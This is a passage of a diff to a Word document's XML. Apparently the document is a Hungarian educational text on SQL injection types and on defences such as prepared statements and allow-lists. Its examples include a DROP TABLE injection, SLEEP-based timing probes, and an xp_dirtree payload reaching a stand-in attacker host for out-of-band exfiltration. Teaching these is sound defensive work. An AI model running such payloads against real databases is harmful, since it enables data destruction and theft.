+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5527,25 +5016,23 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Users</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Users</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>WHERE</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5553,7 +5040,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>WHERE</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5561,25 +5048,23 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>UserId</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>UserId</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5587,7 +5072,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>=</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5595,7 +5080,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>105;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5603,7 +5088,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>105;</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5611,7 +5096,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>DROP</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5619,7 +5104,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>DROP</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5627,7 +5112,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>TABLE</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5635,7 +5120,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>TABLE</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5643,16 +5128,15 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Su</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Su</w:t>
+        <w:t>s</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5660,17 +5144,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>ppliers</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:vertAlign w:val="superscript"/>
@@ -5778,21 +5253,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>error-based</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> (error-based)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6009,31 +5470,19 @@
       <w:r>
         <w:t>Vak (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>blind</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>inferential</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, inferential</w:t>
+      </w:r>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>SQLi</w:t>
+        <w:t xml:space="preserve"> SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="9"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6178,21 +5627,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>boolean-based</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> (boolean-based)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6336,97 +5771,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>title</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>description</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>doby</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>items</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>=</w:t>
+        <w:t xml:space="preserve"> SELECT title, description, doby FROM items WHERE id=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6669,21 +6014,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>time-based</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
+        <w:t xml:space="preserve">(time-based) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6727,19 +6058,11 @@
         </w:rPr>
         <w:t xml:space="preserve">például </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>MySQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-ben a legkézenfekvőbb megoldást a </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">MySQL-ben a legkézenfekvőbb megoldást a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6763,7 +6086,6 @@
         </w:rPr>
         <w:t xml:space="preserve">SELECT * FROM </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6772,79 +6094,79 @@
         </w:rPr>
         <w:t>card</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> WHERE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> WHERE id=1-SLEEP(15)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [5]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z injektálás lehetséges és a szerver a MySQL-t használja adatbázisként.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Következő lépésként például </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>kinyerhető</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>=1-SLEEP(15)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> [5]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A másodpercben megadott szám késlelteti a lekérdezés eredményét ideális esetben. Így tehát a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> válaszidő jelzi a támadó számára, hogy a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>MySQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-t használja adatbázisként.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t>SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -6853,96 +6175,13 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Következő lépésként például </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kinyerhető</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az adatbázis verziója: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>card</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>[5]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>MySQL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 5.x verzióját futtatja.</w:t>
+        <w:t>, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a MySQL 5.x verzióját futtatja.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6965,25 +6204,12 @@
         <w:t>out-of</w:t>
       </w:r>
       <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>band</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>SQLi</w:t>
+        <w:t>-band)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="10"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7064,7 +6290,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> például a Microsoft SQL Server </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -7073,7 +6298,6 @@
         </w:rPr>
         <w:t>xp_dirtree</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7189,150 +6413,42 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>master</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, amely az alábbi lekérdezést eredményezi: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>xp_dirtree</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> '\\test.attacker.com\' </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[6]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, amely az alábbi lekérdezést eredményezi: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>product</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">=1;EXEC </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>master</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>xp_dirtree</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ’\\test.attacker.com\’ </w:t>
+        <w:t xml:space="preserve">SELECT * FROM product WHERE id=1;EXEC master..xp_dirtree ’\\test.attacker.com\’ </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7581,43 +6697,7 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Elkészített utasítások (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>prepared</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>statements</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>) használata</w:t>
+        <w:t>Elkészített utasítások (prepared statements) használata</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7685,14 +6765,12 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>boolean-based</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7881,43 +6959,7 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Tárolt eljárások (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>stored</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>procedures</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>) használata</w:t>
+        <w:t>Tárolt eljárások (stored procedures) használata</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8025,7 +7067,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> az </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -8034,7 +7075,6 @@
         </w:rPr>
         <w:t>sp_getAccountBalance</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -8148,25 +7188,7 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Engedélyezőlista (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>allow-list</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>) bemenetének ellenőrzése</w:t>
+        <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8284,35 +7306,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> („</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>bind</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>variables</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>”).</w:t>
+        <w:t xml:space="preserve"> („bind variables”).</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8426,23 +7420,13 @@
         </w:rPr>
         <w:t xml:space="preserve">különböző ágakban vizsgálja a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>tableName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">tableName </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8837,14 +7821,12 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>supervised</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
